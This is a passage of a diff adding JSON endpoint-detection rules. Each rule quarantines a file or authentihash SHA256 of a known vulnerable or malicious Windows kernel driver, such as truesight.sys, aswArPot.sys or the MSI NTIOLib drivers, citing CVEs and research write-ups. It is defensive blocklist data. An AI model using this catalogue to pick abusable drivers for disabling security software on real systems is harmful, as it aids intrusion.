+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820789Z",
+ "creation_date": "2026-03-23T11:45:30.820791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66f851b309bada6d3e4b211baa23b534165b29ba16b5cbf5e8f44eaeb3ca86ea",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cb65f2e-4fdf-5479-8674-5f7df7267593",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147205Z",
+ "creation_date": "2026-03-23T11:45:32.147207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13c4583048ebee27a2983feab18e6e4fdcb676f2c4f9880e6433839cc2d520bb",
+ "comment": "Malicious Kernel Driver (aka ProjectConfiguration.sys) [https://securelist.com/honeymyte-kernel-mode-rootkit/118590/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cc0df16-ce2f-5bc7-bbc6-f0f0ba83ddd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836649Z",
+ "creation_date": "2026-03-23T11:45:30.836651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "019dea3bea77f17aca0748717180adfe91130448ee6c236f240931ba15d5fb12",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cc6c790-d9ee-5fac-bae6-b16857b07e79",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615782Z",
+ "creation_date": "2026-03-23T11:45:29.615783Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "543ee203b355c4cbac74d9bac71fb73c0c5c5c3afe268e2ae8ae48d61d350709",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cc85cbf-8a2b-5927-a174-6f9ff12a85d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143899Z",
+ "creation_date": "2026-03-23T11:45:32.143901Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143907Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95fd266cc454177901cb58f4d30417c4a7caf29be62bb8649e5b8fca58823600",
+ "comment": "Vulnerable Kernel Driver (aka Afd.sys) [https://www.loldrivers.io/drivers/394f49b2-2d78-4d0d-b374-1399695455f3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cce8ff2-9a76-5237-9f8c-e8bab3d4c297",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969418Z",
+ "creation_date": "2026-03-23T11:45:29.969420Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1faa125c9442b20c646411f629dd48afe2d962554c45fc4a8e2d45c1fc611b6c",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cd2dccd-5bfe-5eac-aad2-6f8a37740b7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985375Z",
+ "creation_date": "2026-03-23T11:45:29.985377Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985383Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3cbb2b364a494f096e68dc48cca89799ed27e6b97b17633036e363a98fd4421",
+ "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cd8ab20-6ca6-51fd-a3b5-54df642d25e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829238Z",
+ "creation_date": "2026-03-23T11:45:31.829242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829251Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc2a0bc303d27dc1f4eb71d34a46bb14d59c8a80e32f0fc3f18988076a687e1b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cdecaa5-515b-5e9b-9650-8424bef83efc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497924Z",
+ "creation_date": "2026-03-23T11:45:31.497927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497936Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ecf3f16e261a9d9f949cd60e63f7a0855ca2c8e8dfc7edc494bf7e698ac26897",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cf16b3e-10ae-55fe-8971-6c9e90752897",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143095Z",
+ "creation_date": "2026-03-23T11:45:31.143097Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "416c5a1c88330554302199a9a5b85033d1c7cb8dab4a35ea02fedd81b75c4d99",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cf177d4-6867-5729-a8f4-5e526a832526",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614666Z",
+ "creation_date": "2026-03-23T11:45:29.614668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614673Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cf30658-3cef-542a-aada-cf1ffd3a84f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145464Z",
+ "creation_date": "2026-03-23T11:45:31.145466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93e078ab140c67bc765bbc63852f8a414780f42c895977be3711fafbc5a15756",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cf76e46-a09b-5d7f-a24a-a28aaf77b000",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832479Z",
+ "creation_date": "2026-03-23T11:45:30.832481Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832486Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7148dd4601f683b6038c8aadce698a0c74be1f3940f25dcc44564952e3bd7777",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d09221f-bdbf-5d62-bdb5-5cd28922a4e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622985Z",
+ "creation_date": "2026-03-23T11:45:29.622990Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622995Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40e624bf557b51775af1ca17062c4eca3693322e250b257aec7dc579e626ef07",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d200e5b-516e-597a-a553-25f8d04aefdc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494780Z",
+ "creation_date": "2026-03-23T11:45:31.494782Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494791Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2efc60be1e2ca1389bc275c7946ca8a88105d5df61fd909508f2798d9cd841f4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d219bb3-599d-5ac4-82ea-78e60c0e8c2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827803Z",
+ "creation_date": "2026-03-23T11:45:30.827805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827811Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bdc8c2ca2b138742d4b441e7b3cd3566421d40e45afc6b62a293472926dd912d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d28294e-e7b7-5c0f-832c-efd6b207759c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833399Z",
+ "creation_date": "2026-03-23T11:45:30.833402Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833410Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "713b36a556eff48930301a0087a3bbefa4a1957aeefa560a5875ccab9c7cca45",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d2bdf92-107c-5026-8822-ec0b1a6ee6af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155429Z",
+ "creation_date": "2026-03-23T11:45:31.155432Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155440Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba39b795cc2ecddccb80947c978e53fd660099e152c5828ff608bbae6407b0c8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d2cdf74-57c7-578f-afff-6ad5c50ee4cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140247Z",
+ "creation_date": "2026-03-23T11:45:31.140249Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140255Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2859055855875731449de25b3a0eacda6cfd37520cbb41909db619108d1ab7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d3c7e3d-f301-5763-bcd4-ad341a6f8519",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146546Z",
+ "creation_date": "2026-03-23T11:45:32.146548Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e82d60575309a6bf6145e7d509dac0b2e815a734a492055bf591c8a7ab55865",
+ "comment": "Malicious Kernel Driver (aka driver_ab811ca5.sys) [https://www.loldrivers.io/drivers/09d2e61d-e041-4ec8-ab7b-385848456a36/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d3d4a70-31c5-5aea-beab-5e4669bba483",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823481Z",
+ "creation_date": "2026-03-23T11:45:30.823485Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c22afc69a39092ca8f8efd1b1cad613606339df1c121fcf390f9fc4449c267a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d7748ef-25d4-5787-b0d6-fa4cd43dd5ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145836Z",
+ "creation_date": "2026-03-23T11:45:31.145839Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145856Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb10b1366d191682fad1ad6d163c47c979c0db00e403c8e44952ab53273cab71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d7cc030-2d6a-57a2-9a82-177276ba14f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
